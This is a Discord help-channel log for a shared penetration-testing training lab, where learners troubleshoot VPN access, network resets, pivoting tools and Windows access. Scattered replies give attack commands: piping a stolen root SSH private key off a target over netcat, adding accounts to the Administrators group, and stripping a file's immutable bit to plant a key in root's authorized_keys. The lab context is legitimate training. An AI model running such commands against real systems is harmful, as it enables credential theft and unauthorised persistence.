1 minute ago (Wed Jan 19 19:23:28 2022) RafalM#0728 (ID 898677535091617844): Thank You, I will try soon!

hard plaza
#

just looking at this room. Do you still need to download a specific connection pkg if you want to use your own attack VM? I joined the room, am a member, but it still says "You don't have access to any networks" when I looked for the specific wreath VPN connection pkg that it suggests in the "accessing the network task". Or did you guys just use the attack box?

torpid sentinel
#

You have to download another connection file for wreath network. Once your join the wreath room, go to access, click on network and you will be able to download the connection file. So whenever you want to connect from your box, you will use the new *.ovpn

rocky blaze
#

Hey everyone! I need your help! In Task 20 - Exploitation. I have tried to catch the shell back directly from the root@prod-serv machine. I have open port 15001 in the firewall, then with a nc static binaries, I have started a listener on that port. Then, from my Attack Kali machine, I have 1) Started a sshutle 2) Encoded the reverse shell Powershell payload with the IP:10.200.164.200 (root@prod-serv) and the correct IP (15001), but I can't get my shell back on the root@serv-prod. Anyone has an idea why? 😄

fervent sorrel
#

I'm on task 6 Exploitation. No matter what I do it says the host is unreachable. I checked on the access page and it says I'm connected. I can ping the internal virtual IP address but not 10.200.192.200. I'm not sure what to do?

#

I also disconnected and reconnected but get the same thing.

#

And regenerated the VPN

#

Sheesh, it was stopped. I had extended the time didn't realize it stopped.

oblique oar
rocky blaze
small sapphire
#

@stoic flicker scam

#

@icy viper

#

sorry for tagging both of you, I just suddenly saw Zojja online xD

icy viper
#

No worries, thanks

stoic flicker
winter lintelBOT
#

Gave +1 Rep to @small sapphire

fallen ore
#

hello, does the network go to sleep by itself or i have to do something, and when i come back to the room , will the progress ive already done still be there?

cyan vine
#

If someone resets, your progress will be lost.

#

You share the network with other people so don't expect to keep your progress

fallen ore
#

oh

#

so i have to do it all in one sitting

#

in order to not lose my progress by anyone

cyan vine
#

You don't, just get to a point where you can return to or you will have to repeat certain tasks

fallen ore
#

okay, thanks

strange bison
#

So keep keys and passwords

fallen ore
#

👍🏻

jagged moat
#

the id_rsa key is empty, is that a bug or just someone being an ass and deleting it from the machine?

#

@merry robin (sorry for ping)

jagged moat
jagged moat
#

hello people of the wreath, someone has accidentally or purposely removed the contents of the ID_RSA file on the webserver, therefore I ask if people can save what they are doing and help get the network reset, that would mean a lot 😄

strange bison
merry robin
jagged moat
jagged moat
jagged moat
#

the subnet I am on is 10.200.196.x

jagged moat
#

I got the network reset through voting and it works now

worthy talon
#

hello,

#

So i was doing wreath box last night and suddenly i got disconnected

#

till now i am not able to ping or connect to server

#

even i voted for reset

#

if any one can help me with this?

#

Can someone help me reset the room?

worthy talon
livid scarab
#

just starting this...

surreal sail
#

When you need to restart wreath as you forgot where you were

rocky blaze
#

Yeah, please everyone vote for a reset. This room seems broken somewhere. I have lost my inital foothold and can't re-do the process to attack with CVE 15107 and get my reverse shell back.😭 🥺

strange bison
ancient oasis
#

thanks cherrytree

rocky blaze
winter lintelBOT
#

Gave +1 Rep to @strange bison

rocky blaze
#

Am I missing something in my curl command? I am able to send my payload with python2 43777.py, but trying with CURL does not works... I'm wondering why. This is something I have already done, but this time it does not work. That's weird. And yes I have changed the script 43777 so for the path to be /web/exploit-amandine.php 🙂 Thanks for help!

rocky blaze
low vapor
#

Idk what is the reason I'm unable to connect to the machine using the private key can anyone help me ?

kindred wyvern
#

same issue trying to change sshd

#

config and try to fix that

magic prairie
#

This may work

#

or try 400

strange bison
low vapor
kindred wyvern
low vapor
#

me to same issue

halcyon tulip
#

Is this a great network for learning pivoting through AD ?

strange bison
#

There's network pivoting though.

halcyon tulip
naive silo
#

I'm stuck at pivoting to personal comp .100 I've pivoted the first one ie .150 via chisel and proxychains but I'm not able to pivot on .100 using the same methodology.... If someone could explain me what I'm doing maybe in dm would be great help and I could further elaborate my cmds used and what I tried doing to pivot to .100..........

#

I used basically used chisel socks proxy to get to .150 and I access .150 via proxychains but I'm not able to do the same for .100 ......

rocky blaze
oblique oar
rocky blaze
winter lintelBOT
#

Gave +1 Rep to @oblique oar

oblique oar
#

also are you able to just run a normal command?

rocky blaze
rocky blaze
winter lintelBOT
#

Gave +1 Rep to @oblique oar

oblique oar
#

glad you got it sorted :)

lusty saffron
#

@stoic flicker Nitro Scam ^

stoic flicker
#

-ban 402508845815037953 -ddays 1 nitro scam

#

change your passwords, then appeal.

#

damnit why is yag not here...

kindred wyvern
#

guys can anyone help me why mimikatz not dumping anything ?

#

is it insufficient privileges ?

ancient oasis
kindred wyvern
#

thanks @ancient oasis

#

i shouldn't smoke while learning tho

ancient oasis
ornate plume
#

there seems to be an issue with the network. Can anybody confirm that? I cannot reach any of the machines anymore (neither via my machine nor via the attack box)

robust cloak
#

there are multiple instances of the network so you have to be more specific by mentioning the third octet in the IPs

ornate plume
#

prod server is on 10.200.187.200

robust cloak
#

Also verify that the network is actually up and running. It's been far too often that I do a network and it shuts down without me knowing.

ornate plume
#

network status is running

robust cloak
#

I think regen-ing the VPN has worked for people in the past. If not, I'm not on that subnet, and I'm not staff, so good luck 👍

ornate plume
#

nope. Has nothing to do with the VPN. I can ping a machine in the network but not prod-server

#

but thanks for the help tho

#

just reset the network and now everything works fine

brittle pewter
#

Hello everyone, I know this is an old question, in my LAN the workstations list are no longer visible but accessible directly(using \pc_name), all connectivity diagnostic are ok (ping, nslookup, access to gateway, domain controller ok, etc.) we have windows 7,8 and 10 and sometimes they appear in the list but most of the time are hidden. Any leads?

vivid parcel
#

Hi , I added in etc/hosts the IP address of the target, and it's working just fine to reach it via http://ip/. Now, although I DO have spawned a shell on the target (and I'm root), I thought I'd get (from the target machine) the id_rsa file (WITHOUT reading its content and copying it into clipboard). What I did was to just raise a simple.http server via Python3. All fine and dandy, but now, when I try to access the file fromthe attacking machine, although I try using http://ip/id_rsa file, and I've copied the file to the /tmp folder (which is where I've raised the http.server), whenever I try to wget the file from the Kali , I get some error, and the "httpS://NAMEid_rsa" unreachable. Does it make sense? Why is it happening? is there a way to force the damn thing to go where I want it? Also, I've already tried to remove the entry from /etc/hosts file; without success
Does it make sense? Why is it happening? is there a way to force the damn thing to go where I want it?

lusty saffron
vivid parcel
#

mnope, tried wget via http, as I've spawned an http server via python3 -m http.server

#

although in the hosts file, I've added an entry for the machine

#

I can show you some print screens

lusty saffron
#

But you didn't specify the port number, did you?
wget http://<host>:<port>/id_rsa

vivid parcel
#

127.0.0.1 localhost
127.0.1.1 kali
10.200.193.200 thomaswreath.thm

#

I tried with/without a port

#

and for some reason, wget AUTOMATICALLY tries to dld the https://thomaswreath.thmid_rsa

lusty saffron
#

!docs verify

vivid parcel
thin crescentBOT
lusty saffron
#

You could use netcat to transfer the private key

# on the target machine
nc -nvlp 15001 < id_rsa

# on your system
nc thomaswreath.thm 15001 > id_rsa
vivid parcel
#

whaa

#

Never thought of that 😄

#

let me check right now

brittle pewter
#

Hello everyone, I know this is an old question, in my LAN the workstations list are no longer visible but accessible directly(using \pc_name), all connectivity diagnostic are ok (ping, nslookup, access to gateway, domain controller ok, etc.) we have windows 7,8 and 10 and sometimes they appear in the list but most of the time are hidden. Any leads?

lusty saffron
surreal sail
#

Hello everyone, I have a bit of problems here accessing the wreath network. May I ask it here or in the tech-support channel ?

surreal sail
#

Yeah, idk if this is just me or the machine is actually down. I tried pinging it but it said unreachable

lusty saffron
#

Is it running?

surreal sail
#

and I've connected with the vpn

#

however i could ping the opnvpn server

lusty saffron
#

Was it working before or is that from the start?

surreal sail
#

yep, It was working before

lusty saffron
#

I can't help with that then, you can wait for someone to help you troubleshoot it😄

surreal sail
#

Yeah, np. I think I need tech support for this one, idk.

#

It's working now, maybe someone or sth just able to make it back to work.

surreal sail
#

Oh yeah I have a question for this one. Could socat be used in the wreath prod-serv ? I found that there's a missing lib in the prod-serv.

#

Nvm, I just realized I was using a non-static binary one.

humble jewel
#

lightsaberpepe Successfully finished the network. Thank you for creating it @merry robin

winter lintelBOT
#

Gave +1 Rep to @merry robin

wicked vector
#

Hi, I got in the web server but when I ping the rest of the network from the server, I only see the AWS gateway and the OpenVPN server. Am I missing something?

lusty saffron
#

@stoic flicker Scam ^

dusky wadi
#

Hey anyone knows why the wreath server does not show up in access even I joined the wreath room?

dusky wadi
merry robin
#

-ban 325027101415833601 -ddays 1 Nitro Scam -- Compromised Account

winter lintelBOT
#

🔨 Banned 325027101415833601 indefinitely

winter lintelBOT
#

Gave +1 Rep to @lusty saffron

surreal sail
#

Hello people. Does anyone having this kind of redirection when exploiting the git serv ?

surreal sail
#

Nvm, I put the wrong address there 😊

gusty timber
#

I have troubles with Wreath room, already posted a comment in room bugs. Can somebody please reset id_rsa key and http server, because somebody removed SSH access and probably stopped web server instance on lower and higher port? This is very annoying and I would appreciate help!

#

Or please vote a reset for me. Thanks

vernal epoch
gusty timber
#

10.200.196.X

surreal sail
#

I was wondering why my multi/launcher stager didn't work. I kept using 100.200.... for the last 24 hours

potent socket
#

I also have troubles with the id_rsa key
It throws the following error when I try to ssh the IP:

Permission denied (publickey,gssapi-keyex,gssapi-with-mic).

I have the private key and have also ran chmod 600 id_rsa but still nothing. Any help would be appreciated.

cosmic totem
potent socket
surreal sail
surreal sail
#

Ah, how obvious

deep ibex
#

empty id_rsa on webserver machine.. wp guys, can we reset the machine?

surreal sail
#

+1

#

Or if someone on the network has the private key they could copy it back to the machine

deep ibex
#

need +2 resets

surreal sail
#

Sure i could copy it

#

People who has completed the wreath networks, I have a question for clearing logs. Is it necessary to clear the logs or could it be left untouched ?

strange bison
#

Remember that resetting the network reverts the VMs back to their clean fresh states

wicked vector
#

Hi I can’t reach the web server (57.200) but able to ping 57.250. Do we need a reset?

surreal sail
#

I‘m on .100 but the service with the unquoted service path isnt there anymore…

surreal sail
#

Apparently theres a cleanup script running on the machine but it doesnt actually fix that the service is broken

merry robin
#

Yeah, the cleanup script just removes payloads. It should also be restarting the service though, unless someone removed either the script or the service

#

Go for a reset @surreal sail, and if you figure out who's screwing with it lemme know -- I can remove their access 🙂

surreal sail
#

Nah its fine i got system with another method

#

Ty for the help tho

mystic spire
#

Anyone got problems with using CVE_2019_15107.py? It outputs Failed to connect to https://10.200.193.200:10000/ idk why. I am connected to vpn and i can browse the website.

lusty saffron
wicked vector
#

I created an user that is part of the Administrators and Remote Management Users group on git-serv. But when I login remotely using Evil-winrm, I’m not getting admin privileges. Is there a setting on git-serv that is restricting admin privileges in remote sessions? I’m not able to replicate this in my home machine.

merry robin
wicked vector
#

Hmm….in my home VM, I’m able to maintain admin privileges when I remote in

safe latch
wicked vector
#

Yeah need to open up a port to pivot to the pc. I can do it in a RDP session, just wondering if I can do the same in WinRM

safe latch
#

Yes had the same problem about half an hour ago ... just try to login with administrator user in evil-winrm. That worked for me

#

but don't know why because the users had the same rights

hushed root
#

E: Unable to locate package powershell-empire
E: Unable to locate package starkiller

#

Is that normal ?

#

it seems i can't get the packages from apt

#

Ok, nvm i just found that we can only get it from the git repo on ubuntu

wicked vector
wicked vector
#

just tried logging in using the hash for the user i created. No luck.

robust cloak
#

Why use the hash if you know the password? 🤔

wicked vector
#

there's something special about the default Administrator account

#

for some reason when i login using winrm, I dont have admin privilege even thou the account is in the Administrators group

#

but when i login using the Administrator account, i get admin privileges

robust cloak
#

And you ran both of these for the account you made?

net localgroup Administrators USERNAME /add
net localgroup "Remote Management Users" USERNAME /add
wicked vector
#

yes

robust cloak
#

When you're in with winrm on the account you created, can you see yourself in the groups using whoami /groups?

wicked vector
#

yes

robust cloak
#

then I genuinely have no clue

#

might be integrity of the process, but I don't know beyond that

wicked vector
#

ok no worries, I'll move on. Thanks.

safe latch
mystic spire
wicked vector
safe latch
safe latch
#

Can someone help me with downloading a directory with Evil-winrm? i use download name_of_directory it says Download successful but there is nothing on my local machine

#

Ahhh got it 😅

lusty saffron
#

@strange bison Discord Nitro^
Sorry no mods were online😅

safe latch
#

Is it possible that windows defender blocked my IP because I run a script on the machine catched up by windows defender?

humble jewel
#

I don't think it blocks IPs.

safe latch
#

since yesterday i run msfvenom exploit on the machine i'm unable to get a connection to the machine

lusty saffron
#

There may not be exact same words, but it is mentioned😅

wicked vector
#

nc.exe didn't work for me. nc64.exe worked

surreal sail
#

I cant access the wreath network at all.
There is no way to start the lab
Its not coming up in my networks tab

#

Any ideas?

#

i dont have a button to start the network

lusty saffron
surreal sail
#

All good it worked 🙂

#

I left came back and used chrome

#

Thanks 🙂

safe latch
#

Someone killed the ssh access to 10.200.101.200. If I leave the room and join again I get back in the same room. Any ideas?

tiny plinth
#

Hi guys
I need soem help.....I am trying to get from the "prod-server" to the "git-server"
Started listener on "prod-server" but when running the powershell cmd to get a reverse shell from the "git-server" nothing happens.
If I run "whoami" on the "git-server" I get an answer.
Probably the powershell cmd is not working?
Or anything else that I am doing wrong?

wicked vector
#

maybe something is filtering packets?

humble jewel
#

is that port even open?

robust cloak
#

Scam? 🤔

humble jewel
#

malicious that

#

@hard mortar can you take care of that?

hard mortar
#

@humble jewel done

humble jewel
#

blobheart thanks

tiny plinth
#

Thank you guys for the support. It is working now as it should.

whole thicket
#

YOU GOT THIS!

clever tundra
#

Is there a private network for subscription? If not there should be.

merry robin
clever tundra
#

Thank you! I ask because we are using this specific room for a homework assignment and there is a deadline. Several of us are having a tough time with technical difficulties such as certain elements of the network not being available. Sometimes the wait time for a reset can be upwards of 3 hours. I will pass this on to the group and go from there.

merry robin
# clever tundra Thank you! I ask because we are using this specific room for a homework assignme...

Bear in mind that (especially with a group), you can each press reset once per hour, so that may speed things up a bit 🙂
If people are breaking stuff and you can identify who it is, let me know and I can kick 'em out of the room -- shared environments are no place for trolls 🤷‍♂️
Other than that there isn't a lot I can do about it personally, I'm afraid -- I still don't have a management console for it. If it's a recurring problem, maybe suggest to your school that they reach out to (probably) education@tryhackme.com to get some dedicated instances of the network created 🙂

clever tundra
clever tundra
#

Someone or some people are clearly intentionally attacking the network it's been constantly down over the last two days. Super frustrating. Never enough people active to create a reset.

surreal sail
#

can someone explain sshuttle to me? It's requesting the password even though I'm supplying the private key

#

no issues when using ssh normally

merry robin
#

Run it with sudo

surreal sail
#

okay it's working now but also adds

Failed to flush caches: Unit dbus-org.freedesktop.resolve1.service not found.
fw: Received non-zero return code 1 when flushing DNS resolver cache.
#

nvm it's still working I'll diagnose that error later

surreal sail
#

@merry robin had a few hiccups along the way, but overall great room/network! I learned a ton

rough fossil
#

the git server on the 10.200.73 network is down for me. sitting at 6/8 for a reset currently

rough fossil
#

i'm still not able to access the git server on the 10.200.73. network even after a reset. anyone else having the same issue?

mellow brook
#

I'm not able to get access through ssh. After resetting the network I'm facing the same problem. What should I do?

rough fossil
#

checked again today and the git server is still down. i'm on task 33 and can't access the git server with evil winrm or ssh. it's not even responding to pings and this is after a reset

lusty saffron
#
Three machines-
- .200 - prod-serv -> CentOS (Linux)
- .150 - git-serv -> Windows
- .100 - wreath-pc -> Windows
#

Also, it won't be accessible from your system. If that's what you're trying

rough fossil
rough fossil
#

i can't ssh into anymore from either machine

lusty saffron
#

It will be accessible from the prod-serv, is that too not accessible?

rough fossil
#

it is. do i have to run evil-winrm from the prod server to get into the git server?

lusty saffron
#

Yes

#

Or pivot, using tunnels or reverse proxies

rough fossil
#

gotchu. i'll give it another shot

rough fossil
#

i forgot to start up sshuttle. smooth brain on overload. thanks for the help @lusty saffron

winter lintelBOT
#

Gave +1 Rep to @lusty saffron

knotty forge
#

I need help, the prod-server doenst respond, while i was setting up empire the server "crashed" or atleast he doenst respond to pings now, all ssh connections got disconnected i cant do anything than wait because nobody is voting to reset. What should i do?

#

The server status is also running

strange bison
knotty forge
winter lintelBOT
#

Gave +1 Rep to @strange bison

strange bison
knotty forge
#

Why is it showing this error (couldnt find anything online)

#

Same with Starkiller

small sapphire
knotty forge
small sapphire
knotty forge
#

If i try my vpn ip it shows the same error

small sapphire
knotty forge
#

Im using a usb-booted version of parrot os

#

Everything works fine i tried other listeners too which worked

#

But if i try to use this one it throws an error

small sapphire
knotty forge
#

Ok i will try that

#

I think i have found the problem

#

I thought this was a special listener format but its just the name of a listener thats already there

winter lintelBOT
#

Gave +1 Rep to @small sapphire

small sapphire
golden quest
#

Same as you, unstable ssh connection / it doesn’t respond to ping some time. I have voted for a reset

delicate pewter
#

hi all
is there something up with the wreath network?
unable to ping .150 git-srv

lusty saffron
strange bison
lusty saffron
#

Sorry, if that's incorrect regarding the wreath network
I think, I told the same to one more user earlier😅

strange bison
#

It's not just incorrect regarding wreath, it's a nuance that matters all over THM and beyond.

lusty saffron
#

Yeah, I know about that. Windows Firewall blocking it, I was reading it now 😅

delicate pewter
#

hi all
trying to access pages on .100
ive got sshuttle and a chisel forward tunnel going
i'm finding that accessing .100 is taking a really long time
I understand a double pivot will never be fast, but any ideas on speeding things up?

surreal sail
#

@buoyant flume

delicate pewter
#

Just finished Wreath
Amazing network, learnt a tonne
Was wondering if THM has anything else that's similar?

surreal sail
#

Maybe Holo.

#

I don't know if that's different in anyway.

ancient oasis
latent spoke
#

no clicky

steady isle
#

-ban 230063922810585088 -ddays 1 nitro discord scam spam. in case account was compromised, appeal the THM ban at bans@tryhackme.com

winter lintelBOT
#

🔨 Banned Pol#3188 indefinitely

ancient oasis
#

@fair breach

#

@strange bison

strange bison
#

-ban @surreal sail -ddays 1 nitro discord scam spam. in case account was compromised, appeal the THM ban at bans@tryhackme.com

winter lintelBOT
#

🔨 Banned mhaamahdhi#9206 indefinitely

mild horizon
#

hi all, i have a 7day badge and am a prem user how come under access in my profile i cant see anything in network?

mild horizon
#

Haha just figured it out

ancient oasis
#

@static elk

vale smelt
#

Hello !
I lost the connection with machines, I tried to ping *.73.200 but every packet is lost (host unreachable). I have regenerated the vpn configuration but nothing works

late lodge
#

Hi not sure if anybody else if having problems with task 20....When I forward the port of gitstack so I can access it via localhost I can get a connection, but within 20 seconds I get broken pipe errors. Reconnected VPN, rebooted my kali box (bare metal not a VM) and no go.

ornate crest
#

Hello, does anyone have id_rsa key to host 10.200.x.200? Because someone replaced it with this html site:

cat /root/.ssh/id_rsa

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="https://thomaswreath.thmroot/.ssh/id_rsa">here</a>.</p>
</body></html>

I have this problem second day in row. Tried vote to reset a box, without luck. I'm at task 18 and now really need to have working ssh 😄 not just stabilised shell.

strange robin
#

Apologies to everyone else for the wall of text.

ornate crest
#

@strange robin Thank You 😉 You can delete your messege 🙂

winter lintelBOT
#

Gave +1 Rep to @strange robin

errant harbor
#

Hi is anyone working on the box? I am on the very 1st step. Accessing the webpage doesn't seem to be possible: try Ip and domain name

late lodge
#

Going to give up and work on something else for now

errant harbor
#

it's a pity. It takes 8 votes to reset the machine.

#

I will not be able to work on it to prep for my upcoming exam

strange bison
#

@errant harbor @late lodge Remember that there are several instances of Wreath. Problems in one do not reflect in others - saying it's reset isn't applicable to the other instances

errant harbor
#

how do I access other instances?

strange bison
errant harbor
#

Strange. I am having trouble nmapping both wreath and throwback. Ports that I know are open shows filtered

strange bison
strange robin
#

Going a little crazy over here on Task 22, question "What is Thomas' password?"
The NTLM hash decodes to "i<3ruby", the official walkthrough video shows the password is "i<3ruby", but when I enter that into the answer box, it tells me I'm wrong. Anyone have any idea what I'm missing?

humble jewel
#

check the exact spelling or let the terminal put it in your clipboard.

strange robin
surreal sail
#

Are you answering a taks, or trying to login?

strange robin
surreal sail
#

AH, I was getting confused as you originally said Task 22

#

Maybe a bug, as i can't put the password in either, and the hash is correct.#

strange robin
winter lintelBOT
#

Gave +1 Rep to @vital relic

merry robin
surreal sail
merry robin
#

*sigh*
Betcha they re-introduced the XSS filtering that blocks the < in it

#

@fair breach could you raise this internally please? <3

strange robin
winter lintelBOT
#

Gave +1 Rep to @merry robin

surreal sail
#

I thought I would try it without the i,<,3 (one a time) to see if answer tolerance would kick in.

split harbor
#

@barren wren ⬆️ probably a scam message above(who is shadow joking... obviously a scam)

ancient oasis
#

@steady isle

late lodge
#

Thanks @merry robin learnt a ton of stuff along the way, just need the task 21 "Thomas Password" question sorting to complete.

winter lintelBOT
#

Gave +1 Rep to @merry robin

lusty saffron
late lodge
surreal sail
lusty saffron
#

I got it, issue with <> in the answers

ancient oasis
#

This also happened in windows forensics 3 where an answer was "<answer>"

drifting wasp
#

Just completed Wreath, it was very fun.
I have one question regarding the network, in Task 41 it is suggested to upload netcat to c\windows\temp, however when I tried to do this I couldn't (but ||both web uploads dir and user's Temp|| worked), anyone else encountered this?

merry robin
#

Or @surreal sail -- either of you

surreal sail
merry robin
#

Perfect

late lodge
#

Yep sorted cheers

charred mirage
#

I need to some help In the task on downloading website.git I tried on evil winrm shows successful but on my machine am not able to see it, I referred few blogs though still unlucky

surreal sail
modest arch
#

anybody else having issues with sshuttle and --ssh-cmd "ssh -i id_rsa" ?

modest arch
#

I figured out where I was going wrong. apparently sshuttle has to be ran as root

sick latch
#

hi all!
any body have access to lab? I haven't access today. Tomorrow every thing is normal. who now what is a problem?

timber lily
#

Hi,
I'm trying to move the system.bak file but I'm getting "An unexpected network error occured". Any help? please 🥺

lime zodiac
#

I cannot downloading the open vpn fille

#

please help me

lime zodiac
#

Hello I am getting 404 error downloading the vpn file

#

!vpnscript

thin crescentBOT
vital siren
#

hello , anyone starting it from start . need to collab with me ?? i will start it from today. please DM it will help me a lot

humble jewel
#

Not really starting from start but I could help you if you need it.

vital siren
winter lintelBOT
#

Gave +1 Rep to @humble jewel

cedar rock
#

Hey all just started wreath today, working on exploiting the webserver and I keep getting this python error, has anyone else experienced this error at this point in the network? Trying to determine if its like an issue with my kali or just maybe the tool being used

#

The exploit just kinda freezes out on me when I try to upgrade from the psuedoshell into full reverse shell.

cedar rock
#

Seems like this above SS is an issue with my pyenv..dang

lusty saffron
cedar rock
cedar rock
lusty saffron
#

It seems it doesn't have access to create a file - commands.txt in the directory it is started from

cedar rock
#

Yup, ofc running it as sudo this time around works lol, ty for pointing that out

lusty saffron
#

You shouldn't run a public exploit script or code with sudo
It may not be safe. Although this one is provided by the room creator, Muiriblobfingerguns

cedar rock
#

So another QQ, Im trying to pull the root users password hash out for task6 but the hash I am looking at in etc/shadow very clearly doesnt match the format they want in the task/question or even in the walkthrough?

#

Is it possible someone changed the password? Kinda looks like that is the case...

humble jewel
#

seems like it. It happens a lot that someone messes with stuff.

strange bison
#

-ban @surreal sail -ddays 1 Nitro Scam.

winter lintelBOT
#

🔨 Banned *Joker#8879 indefinitely

cedar rock
worn glade
#

Hi i need help with wreath openvpn file, it gives 404 error

knotty forge
#

Hello i am getting this error when i try to connect to the prod server with the id_rsa file its my second time playing this room and the first time it worked lol

ancient oasis
knotty forge
knotty forge
ancient oasis
knotty forge
#

yeah its curr 0/8 will take some time

#

would it be possible to overwrite the id_rsa key

#

others could still use it

ancient oasis
#

no, I've been told it's best to keep it unchanged

#

simply, go for a reset, I think you can vote every one or two hours

lusty saffron
#

They could append their own id_rsa.pub's content into /root/.ssh/authorized_keysblobfingerguns

knotty forge
#

Ok thx :)

ancient oasis
lusty saffron
#

I said to __append__😅

ancient oasis
#

I know, but still users can mess up 🙂

knotty forge
lusty saffron
#

Because you don't have a tty, nano requires it to find the terminal width and height

knotty forge
#

yeah but >> didnt work too

lusty saffron
#

You can cat screamz_rsa.pub >> authorized_keys (make sure to append, >>)

knotty forge
#

i did that look in the screenshot

#

3 cmd

lusty saffron
#

Oh, sorry 😅

#

Muiri must have set immutable bit on the file

knotty forge
#

yeah

#

but not on the id_rsa apparently

#

oh wait

#

this one doesnt work too

lusty saffron
#

You can remove that bit 😅

knotty forge
#

how?

ancient oasis
lusty saffron
#

||```bash
chattr -i authorized_keys
cat screamz_rsa.pub >> authorized_keys
chattr +i authorized_keys

knotty forge
#

ok did it

#

it didnt show an error this time

#

thx alot :)

lusty saffron
#

Check if your key works nowblobfingerguns

lusty saffron
knotty forge
#

its still saying bad format

#

whats the syntax to upload with scp again

#

it might work like this

lusty saffron
#

screamz_rsa, this time?

knotty forge
#

yes

knotty forge
lusty saffron
knotty forge
#

when i try to load the key using the -i flag at the ssh connect

knotty forge
#

the id_rsa is just the old name

#

its the new key

lusty saffron
#

But wait, how will you scp?

knotty forge
#

sudo systemctl start ssh

#

and then scp into my machine

#

from the reverse shell

lusty saffron
#

Just run a http.server and wget your private key
Make sure to use a port > 15000

#

Don't run ssh service on your host

knotty forge
#

yeah im such a dumbass why didnt i thought about that

knotty forge